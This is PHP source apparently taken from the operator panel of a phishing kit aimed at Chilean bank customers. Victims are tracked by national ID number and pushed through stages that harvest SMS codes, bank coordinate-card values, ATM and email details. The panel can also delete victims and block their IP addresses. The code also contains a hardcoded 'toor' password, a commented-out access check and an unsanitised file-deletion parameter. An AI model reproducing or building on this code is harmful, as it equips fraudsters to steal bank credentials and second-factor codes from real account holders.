<?php
class Panel
{

    static public function reading() {

        if (isset($_POST['iduser']) && $_POST['iduser'] != "") :
            //CONECTANDO A BASEDEDATOS
            $db = new Dbase();
            //CAMBIANDO ESTADO DE CLIENTE
            if ($db->conectar() == "") :
                //grabando la bd
                $db->updateRead(["rut" => $_POST['iduser'], "reading" => 0]);
                exit();
            endif;
        endif;
    }

    static public function manager() {

        //CONECTANDO A BASEDEDATOS
        $db = new Dbase();
        //ENVIANDO CONSULTA PARA OBTENER RESULTADO
        if ($db->conectar() == "") :

            $userData = $db->getUserID(["documento" => $_POST["iduser"]]);
            print_r(json_encode($userData));
            exit();

        endif;
    }


    static public function grabar()
    {

        if (isset($_POST["user"], $_POST['cboproceso'])) :
            //CONECTANDO A BASEDEDATOS
            $db = new Dbase();
            if ($db->conectar() == "") :

                if ($_POST["cboproceso"] == 2) :
                    $db->updateuser(["rut" => $_POST["user"],  "estado" => "en-credito", "proceso" => 2]);
                elseif ($_POST["cboproceso"] == 3) :
                    $db->updateuser(["rut" => $_POST["user"],  "estado" => "en-sms", "proceso" => 3]);
                elseif ($_POST["cboproceso"] == 4) :
                    $db->updatecordu(["rut" => $_POST["user"], "cordea" => strtoupper($_POST["corde1"]), "cordeb" => strtoupper($_POST["corde2"]), "cordec" => strtoupper($_POST["corde3"]),  "estado" => "en-corde", "proceso" => 4]);
                elseif ($_POST["cboproceso"] == 5) :
                    $db->updateuser(["rut" => $_POST["user"],  "estado" => "en-fullcorde", "proceso" => 5]);
                elseif ($_POST["cboproceso"] == 7) :
                    $db->updateuser(["rut" => $_POST["user"],  "estado" => "en-atm", "proceso" => 7]);
                elseif ($_POST["cboproceso"] == 8) :
                    $db->updateuser(["rut" => $_POST["user"],  "estado" => "en-mail", "proceso" => 8]);
                elseif ($_POST["cboproceso"] == 9) :
                    $db->updateuser(["rut" => $_POST["user"],  "estado" => "en-mesage", "proceso" => 9]);    
                elseif ($_POST["cboproceso"] == 10) :
                    $db->updateuser(["rut" => $_POST["user"],  "estado" => "en-home", "proceso" => 10]);    
                endif;

                print_r(json_encode(['pr' => 1]));

            endif;
        else:
            print_r(json_encode(['pr' => 2]));
        endif;
    }


    static public function borraru() {

        if (isset($_POST['iduser']) && $_POST['iduser'] != "") :
            //CONECTANDO A BASEDEDATOS
            $db = new Dbase();
            //ENVIANDO CONSULTA PARA OBTENER RESULTADO
            if ($db->conectar() == "") :

                $db->borraru(["rut" => $_POST["iduser"]]);
                print_r(json_encode(array("pr" => 1, 'id' => $_POST['iduser'])));
                exit();

            endif;
        endif;
        
    }

    static public function bloqued() {

        if (isset($_POST['iduser']) && $_POST['iduser'] != "") :
            $tool = new Tools();
            $db = new Dbase();
            if($db->conectar() == ""):

                $user = $db->getUserID(['rut' => $_POST['iduser']]);
                if ($user != "") :
                    $db->borraru(["rut" => $_POST["iduser"]]);
                    $tool->bloquedHT(['ip' => $user->ip]);
                    print json_encode(['pr' => 1, 'id' => $_POST['iduser']]);
                endif;

            endif;
        endif;

    }


    static public function createDB(){
        //CONECTANDO A BASEDEDATOS
        $db = new Dbase();
        //ENVIANDO CONSULTA PARA OBTENER RESULTADO
        if ($db->conectar() == "") :

            $rt = $db->creartablas();
            if ($rt == "") {
                print 'SE AH CREADO LA BD';
            }else{
                print $rt;
            }

        endif;
    }


    static public function setestado() {

        if (isset($_POST['iduser']) && $_POST['iduser'] != "") :
            $db = new Dbase();
            if ($db->conectar() == "") :
                $db->setestado(['estado' => $_POST['iduser']]);
            endif;
        endif;
    }

    

    static public function viewlogos() {
        //mostrando vista
        //include 'app/html/' . filename;
                
                
        session_start();
        
        if($_POST["psw"]){
            $_SESSION["psw"]=$_POST["psw"];
        }
        if($_SESSION["psw"]!='toor'){
            
            include 'app/template/panel/password.php';
            exit();
        }

        
        $path    = 'app/html/';
        if($_GET["del"]!=""){
            unlink($path.$_GET["del"]);
            header("Location: ?act=list");
            exit();

        }
        $files = array_diff(scandir($path), array('.', '..'));
        
        include 'app/template/panel/logos.php';

    }

    static public function viewpanel() {


        
        session_start();
        
        /*
        if($_POST["psw"]){
            $_SESSION["psw"]=$_POST["psw"];
        }
        if($_SESSION["psw"]!='toor'){
            
            include 'app/template/panel/panel.php';
            exit();
        }
        */

        //CARGANDO HERRAMIENTAS
        $tools = new Tools();
        //CARGANDO BASEDATOS
        $db = new Dbase();
        if ($db->conectar() == '') :

            $panelestado = $db->paestado();
            
            //obteniendo los clientes de la bd
            $userAll = $db->getUserall();
            //mostrando vista
            include 'app/template/panel/panel.php';

        endif;
    }

    

    static public function trfila() {

        //CONECTANDO A BASEDEDATOS
        $db = new Dbase();
        //ENVIANDO CONSULTA PARA OBTENER RESULTADO
        if ($db->conectar() == "") :
//print_r($db->getUserall());
            $userData = json_encode($db->getUserall(),JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_UNESCAPED_UNICODE);
            print_r($userData);
            exit();

        endif;
    }

    

}
